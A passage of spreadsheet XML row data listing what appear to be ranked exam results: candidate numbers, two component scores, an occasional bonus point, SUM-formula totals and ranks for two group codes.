        <f aca="false">SUM(E646:G646)</f>
        <v>121.2</v>
      </c>
      <c r="I646" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="647" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A647" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B647" s="8" t="n">
        <v>1314012228</v>
      </c>
      <c r="C647" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D647" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E647" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="F647" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G647" s="8"/>
      <c r="H647" s="8" t="n">
        <f aca="false">SUM(E647:G647)</f>
        <v>118.8</v>
      </c>
      <c r="I647" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="648" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A648" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B648" s="8" t="n">
        <v>1314012224</v>
      </c>
      <c r="C648" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D648" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E648" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F648" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="G648" s="8"/>
      <c r="H648" s="8" t="n">
        <f aca="false">SUM(E648:G648)</f>
        <v>117.6</v>
      </c>
      <c r="I648" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="649" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A649" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B649" s="8" t="n">
        <v>1314012301</v>
      </c>
      <c r="C649" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D649" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E649" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="F649" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="G649" s="8"/>
      <c r="H649" s="8" t="n">
        <f aca="false">SUM(E649:G649)</f>
        <v>116.8</v>
      </c>
      <c r="I649" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="650" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A650" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B650" s="8" t="n">
        <v>1314012217</v>
      </c>
      <c r="C650" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D650" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E650" s="8" t="n">
        <v>52.4</v>
      </c>
      <c r="F650" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="G650" s="8"/>
      <c r="H650" s="8" t="n">
        <f aca="false">SUM(E650:G650)</f>
        <v>113.8</v>
      </c>
      <c r="I650" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="651" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A651" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B651" s="8" t="n">
        <v>1314012219</v>
      </c>
      <c r="C651" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D651" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E651" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F651" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="G651" s="8"/>
      <c r="H651" s="8" t="n">
        <f aca="false">SUM(E651:G651)</f>
        <v>112</v>
      </c>
      <c r="I651" s="8" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="652" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A652" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B652" s="8" t="n">
        <v>1314012216</v>
      </c>
      <c r="C652" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D652" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E652" s="8" t="n">
        <v>48</v>
      </c>
      <c r="F652" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="G652" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H652" s="8" t="n">
        <f aca="false">SUM(E652:G652)</f>
        <v>111.4</v>
      </c>
      <c r="I652" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="653" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A653" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B653" s="8" t="n">
        <v>1314012309</v>
      </c>
      <c r="C653" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D653" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E653" s="8" t="n">
        <v>47.4</v>
      </c>
      <c r="F653" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="G653" s="8"/>
      <c r="H653" s="8" t="n">
        <f aca="false">SUM(E653:G653)</f>
        <v>108.8</v>
      </c>
      <c r="I653" s="8" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="654" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A654" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B654" s="8" t="n">
        <v>1314012226</v>
      </c>
      <c r="C654" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D654" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E654" s="8" t="n">
        <v>44.2</v>
      </c>
      <c r="F654" s="8" t="n">
        <v>63.4</v>
      </c>
      <c r="G654" s="8"/>
      <c r="H654" s="8" t="n">
        <f aca="false">SUM(E654:G654)</f>
        <v>107.6</v>
      </c>
      <c r="I654" s="8" t="n">
        <v>18</v>
      </c>
    </row>
    <row r="655" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A655" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B655" s="8" t="n">
        <v>1314012303</v>
      </c>
      <c r="C655" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D655" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E655" s="8" t="n">
        <v>45.2</v>
      </c>
      <c r="F655" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G655" s="8"/>
      <c r="H655" s="8" t="n">
        <f aca="false">SUM(E655:G655)</f>
        <v>105</v>
      </c>
      <c r="I655" s="8" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="656" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A656" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B656" s="8" t="n">
        <v>1314012225</v>
      </c>
      <c r="C656" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D656" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E656" s="8" t="n">
        <v>46.8</v>
      </c>
      <c r="F656" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G656" s="8"/>
      <c r="H656" s="8" t="n">
        <f aca="false">SUM(E656:G656)</f>
        <v>101.8</v>
      </c>
      <c r="I656" s="8" t="n">
        <v>20</v>
      </c>
    </row>
    <row r="657" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A657" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B657" s="8" t="n">
        <v>1314012215</v>
      </c>
      <c r="C657" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D657" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E657" s="8" t="n">
        <v>47.6</v>
      </c>
      <c r="F657" s="8" t="n">
        <v>53.4</v>
      </c>
      <c r="G657" s="8"/>
      <c r="H657" s="8" t="n">
        <f aca="false">SUM(E657:G657)</f>
        <v>101</v>
      </c>
      <c r="I657" s="8" t="n">
        <v>21</v>
      </c>
    </row>
    <row r="658" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A658" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B658" s="8" t="n">
        <v>1314012316</v>
      </c>
      <c r="C658" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D658" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E658" s="8" t="n">
        <v>47</v>
      </c>
      <c r="F658" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="G658" s="8"/>
      <c r="H658" s="8" t="n">
        <f aca="false">SUM(E658:G658)</f>
        <v>98.4</v>
      </c>
      <c r="I658" s="8" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="659" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A659" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B659" s="8" t="n">
        <v>1314012302</v>
      </c>
      <c r="C659" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D659" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E659" s="8" t="n">
        <v>49</v>
      </c>
      <c r="F659" s="8" t="n">
        <v>48</v>
      </c>
      <c r="G659" s="8"/>
      <c r="H659" s="8" t="n">
        <f aca="false">SUM(E659:G659)</f>
        <v>97</v>
      </c>
      <c r="I659" s="8" t="n">
        <v>23</v>
      </c>
    </row>
    <row r="660" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A660" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B660" s="8" t="n">
        <v>1314012314</v>
      </c>
      <c r="C660" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D660" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E660" s="8" t="n">
        <v>41.8</v>
      </c>
      <c r="F660" s="8" t="n">
        <v>54.4</v>
      </c>
      <c r="G660" s="8"/>
      <c r="H660" s="8" t="n">
        <f aca="false">SUM(E660:G660)</f>
        <v>96.2</v>
      </c>
      <c r="I660" s="8" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="661" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A661" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B661" s="8" t="n">
        <v>1314012227</v>
      </c>
      <c r="C661" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D661" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E661" s="8" t="n">
        <v>42.6</v>
      </c>
      <c r="F661" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="G661" s="8"/>
      <c r="H661" s="8" t="n">
        <f aca="false">SUM(E661:G661)</f>
        <v>95.8</v>
      </c>
      <c r="I661" s="8" t="n">
        <v>25</v>
      </c>
    </row>
    <row r="662" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A662" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B662" s="8" t="n">
        <v>1314012308</v>
      </c>
      <c r="C662" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D662" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E662" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="F662" s="8" t="n">
        <v>50.4</v>
      </c>
      <c r="G662" s="8"/>
      <c r="H662" s="8" t="n">
        <f aca="false">SUM(E662:G662)</f>
        <v>93.8</v>
      </c>
      <c r="I662" s="8" t="n">
        <v>26</v>
      </c>
    </row>
    <row r="663" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A663" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B663" s="8" t="n">
        <v>1314012304</v>
      </c>
      <c r="C663" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D663" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E663" s="8" t="n">
        <v>41.6</v>
      </c>
      <c r="F663" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="G663" s="8"/>
      <c r="H663" s="8" t="n">
        <f aca="false">SUM(E663:G663)</f>
        <v>91</v>
      </c>
      <c r="I663" s="8" t="n">
        <v>27</v>
      </c>
    </row>
    <row r="664" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A664" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B664" s="8" t="n">
        <v>1314012315</v>
      </c>
      <c r="C664" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D664" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E664" s="8" t="n">
        <v>39.6</v>
      </c>
      <c r="F664" s="8" t="n">
        <v>44.4</v>
      </c>
      <c r="G664" s="8"/>
      <c r="H664" s="8" t="n">
        <f aca="false">SUM(E664:G664)</f>
        <v>84</v>
      </c>
      <c r="I664" s="8" t="n">
        <v>28</v>
      </c>
    </row>
    <row r="665" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A665" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B665" s="8" t="n">
        <v>1314012230</v>
      </c>
      <c r="C665" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D665" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E665" s="8" t="n">
        <v>30.6</v>
      </c>
      <c r="F665" s="8" t="n">
        <v>52</v>
      </c>
      <c r="G665" s="8"/>
      <c r="H665" s="8" t="n">
        <f aca="false">SUM(E665:G665)</f>
        <v>82.6</v>
      </c>
      <c r="I665" s="8" t="n">
        <v>29</v>
      </c>
    </row>
    <row r="666" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A666" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B666" s="8" t="n">
        <v>1314012311</v>
      </c>
      <c r="C666" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D666" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E666" s="8" t="n">
        <v>35.6</v>
      </c>
      <c r="F666" s="8" t="n">
        <v>45.4</v>
      </c>
      <c r="G666" s="8"/>
      <c r="H666" s="8" t="n">
        <f aca="false">SUM(E666:G666)</f>
        <v>81</v>
      </c>
      <c r="I666" s="8" t="n">
        <v>30</v>
      </c>
    </row>
    <row r="667" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A667" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B667" s="8" t="n">
        <v>1314012220</v>
      </c>
      <c r="C667" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D667" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E667" s="8" t="n">
        <v>39</v>
      </c>
      <c r="F667" s="8" t="n">
        <v>41.6</v>
      </c>
      <c r="G667" s="8"/>
      <c r="H667" s="8" t="n">
        <f aca="false">SUM(E667:G667)</f>
        <v>80.6</v>
      </c>
      <c r="I667" s="8" t="n">
        <v>31</v>
      </c>
    </row>
    <row r="668" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A668" s="9" t="n">
        <v>4300103</v>
      </c>
      <c r="B668" s="8" t="n">
        <v>1314012305</v>
      </c>
      <c r="C668" s="8" t="s">
        <v>162</v>
      </c>
      <c r="D668" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E668" s="8" t="n">
        <v>33.6</v>
      </c>
      <c r="F668" s="8" t="n">
        <v>43</v>
      </c>
      <c r="G668" s="8"/>
      <c r="H668" s="8" t="n">
        <f aca="false">SUM(E668:G668)</f>
        <v>76.6</v>
      </c>
      <c r="I668" s="8" t="n">
        <v>32</v>
      </c>
    </row>
    <row r="669" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A669" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B669" s="8" t="n">
        <v>1314012317</v>
      </c>
      <c r="C669" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D669" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E669" s="8" t="n">
        <v>69</v>
      </c>
      <c r="F669" s="8" t="n">
        <v>67.8</v>
      </c>
      <c r="G669" s="8"/>
      <c r="H669" s="8" t="n">
        <f aca="false">SUM(E669:G669)</f>
        <v>136.8</v>
      </c>
      <c r="I669" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="670" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A670" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B670" s="8" t="n">
        <v>1314012323</v>
      </c>
      <c r="C670" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D670" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E670" s="8" t="n">
        <v>68</v>
      </c>
      <c r="F670" s="8" t="n">
        <v>67.8</v>
      </c>
      <c r="G670" s="8"/>
      <c r="H670" s="8" t="n">
        <f aca="false">SUM(E670:G670)</f>
        <v>135.8</v>
      </c>
      <c r="I670" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="671" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A671" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B671" s="8" t="n">
        <v>1314012326</v>
      </c>
      <c r="C671" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D671" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E671" s="8" t="n">
        <v>64</v>
      </c>
      <c r="F671" s="8" t="n">
        <v>70.4</v>
      </c>
      <c r="G671" s="8"/>
      <c r="H671" s="8" t="n">
        <f aca="false">SUM(E671:G671)</f>
        <v>134.4</v>
      </c>
      <c r="I671" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="672" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A672" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B672" s="8" t="n">
        <v>1314012329</v>
      </c>
      <c r="C672" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D672" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E672" s="8" t="n">
        <v>56.8</v>
      </c>
      <c r="F672" s="8" t="n">
        <v>72.4</v>
      </c>
      <c r="G672" s="8"/>
      <c r="H672" s="8" t="n">
        <f aca="false">SUM(E672:G672)</f>
        <v>129.2</v>
      </c>
      <c r="I672" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="673" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A673" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B673" s="8" t="n">
        <v>1314012402</v>
      </c>
      <c r="C673" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D673" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E673" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="F673" s="8" t="n">
        <v>68.6</v>
      </c>
      <c r="G673" s="8"/>
      <c r="H673" s="8" t="n">
        <f aca="false">SUM(E673:G673)</f>
        <v>125.2</v>
      </c>
      <c r="I673" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="674" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A674" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B674" s="8" t="n">
        <v>1314012321</v>
      </c>
      <c r="C674" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D674" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E674" s="8" t="n">
        <v>58</v>
      </c>
      <c r="F674" s="8" t="n">
        <v>66</v>
      </c>
      <c r="G674" s="8"/>
      <c r="H674" s="8" t="n">
        <f aca="false">SUM(E674:G674)</f>
        <v>124</v>
      </c>
      <c r="I674" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="675" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A675" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B675" s="8" t="n">
        <v>1314012408</v>
      </c>
      <c r="C675" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D675" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E675" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F675" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G675" s="8"/>
      <c r="H675" s="8" t="n">
        <f aca="false">SUM(E675:G675)</f>
        <v>121</v>
      </c>
      <c r="I675" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="676" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A676" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B676" s="8" t="n">
        <v>1314012409</v>
      </c>
      <c r="C676" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D676" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E676" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F676" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G676" s="8"/>
      <c r="H676" s="8" t="n">
        <f aca="false">SUM(E676:G676)</f>
        <v>118.4</v>
      </c>
      <c r="I676" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="677" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A677" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B677" s="8" t="n">
        <v>1314012411</v>
      </c>
      <c r="C677" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D677" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E677" s="8" t="n">
        <v>53.4</v>
      </c>
      <c r="F677" s="8" t="n">
        <v>64.6</v>
      </c>
      <c r="G677" s="8"/>
      <c r="H677" s="8" t="n">
        <f aca="false">SUM(E677:G677)</f>
        <v>118</v>
      </c>
      <c r="I677" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="678" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A678" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B678" s="8" t="n">
        <v>1314012405</v>
      </c>
      <c r="C678" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D678" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E678" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="F678" s="8" t="n">
        <v>64.2</v>
      </c>
      <c r="G678" s="8"/>
      <c r="H678" s="8" t="n">
        <f aca="false">SUM(E678:G678)</f>
        <v>117.8</v>
      </c>
      <c r="I678" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="679" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A679" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B679" s="8" t="n">
        <v>1314012330</v>
      </c>
      <c r="C679" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D679" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E679" s="8" t="n">
        <v>51</v>
      </c>
      <c r="F679" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G679" s="8"/>
      <c r="H679" s="8" t="n">
        <f aca="false">SUM(E679:G679)</f>
        <v>110.8</v>
      </c>
      <c r="I679" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="680" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A680" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B680" s="8" t="n">
        <v>1314012325</v>
      </c>
      <c r="C680" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D680" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E680" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="F680" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G680" s="8"/>
      <c r="H680" s="8" t="n">
        <f aca="false">SUM(E680:G680)</f>
        <v>110.2</v>
      </c>
      <c r="I680" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="681" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A681" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B681" s="8" t="n">
        <v>1314012320</v>
      </c>
      <c r="C681" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D681" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E681" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="F681" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="G681" s="8"/>
      <c r="H681" s="8" t="n">
        <f aca="false">SUM(E681:G681)</f>
        <v>110</v>
      </c>
      <c r="I681" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="682" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A682" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B682" s="8" t="n">
        <v>1314012318</v>
      </c>
      <c r="C682" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D682" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E682" s="8" t="n">
        <v>48.6</v>
      </c>
      <c r="F682" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G682" s="8"/>
      <c r="H682" s="8" t="n">
        <f aca="false">SUM(E682:G682)</f>
        <v>109.6</v>
      </c>
      <c r="I682" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="683" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A683" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B683" s="8" t="n">
        <v>1314012401</v>
      </c>
      <c r="C683" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D683" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E683" s="8" t="n">
        <v>52.6</v>
      </c>
      <c r="F683" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G683" s="8"/>
      <c r="H683" s="8" t="n">
        <f aca="false">SUM(E683:G683)</f>
        <v>107.6</v>
      </c>
      <c r="I683" s="8" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="684" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A684" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B684" s="8" t="n">
        <v>1314012328</v>
      </c>
      <c r="C684" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D684" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E684" s="8" t="n">
        <v>44.4</v>
      </c>
      <c r="F684" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G684" s="8"/>
      <c r="H684" s="8" t="n">
        <f aca="false">SUM(E684:G684)</f>
        <v>106.8</v>
      </c>
      <c r="I684" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="685" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A685" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B685" s="8" t="n">
        <v>1314012319</v>
      </c>
      <c r="C685" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D685" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E685" s="8" t="n">
        <v>43.6</v>
      </c>
      <c r="F685" s="8" t="n">
        <v>62</v>
      </c>
      <c r="G685" s="8"/>
      <c r="H685" s="8" t="n">
        <f aca="false">SUM(E685:G685)</f>
        <v>105.6</v>
      </c>
      <c r="I685" s="8" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="686" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A686" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B686" s="8" t="n">
        <v>1314012407</v>
      </c>
      <c r="C686" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D686" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E686" s="8" t="n">
        <v>41.8</v>
      </c>
      <c r="F686" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G686" s="8"/>
      <c r="H686" s="8" t="n">
        <f aca="false">SUM(E686:G686)</f>
        <v>104.2</v>
      </c>
      <c r="I686" s="8" t="n">
        <v>18</v>
      </c>
    </row>
    <row r="687" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A687" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B687" s="8" t="n">
        <v>1314012404</v>
      </c>
      <c r="C687" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D687" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E687" s="8" t="n">
        <v>41.2</v>
      </c>
      <c r="F687" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G687" s="8"/>
      <c r="H687" s="8" t="n">
        <f aca="false">SUM(E687:G687)</f>
        <v>96.2</v>
      </c>
      <c r="I687" s="8" t="n">
        <v>19</v>
      </c>
    </row>
    <row r="688" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A688" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B688" s="8" t="n">
        <v>1314012322</v>
      </c>
      <c r="C688" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D688" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E688" s="8" t="n">
        <v>43.6</v>
      </c>
      <c r="F688" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="G688" s="8"/>
      <c r="H688" s="8" t="n">
        <f aca="false">SUM(E688:G688)</f>
        <v>95.4</v>
      </c>
      <c r="I688" s="8" t="n">
        <v>20</v>
      </c>
    </row>
    <row r="689" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A689" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B689" s="8" t="n">
        <v>1314012403</v>
      </c>
      <c r="C689" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D689" s="8" t="s">
        <v>133</v>
      </c>
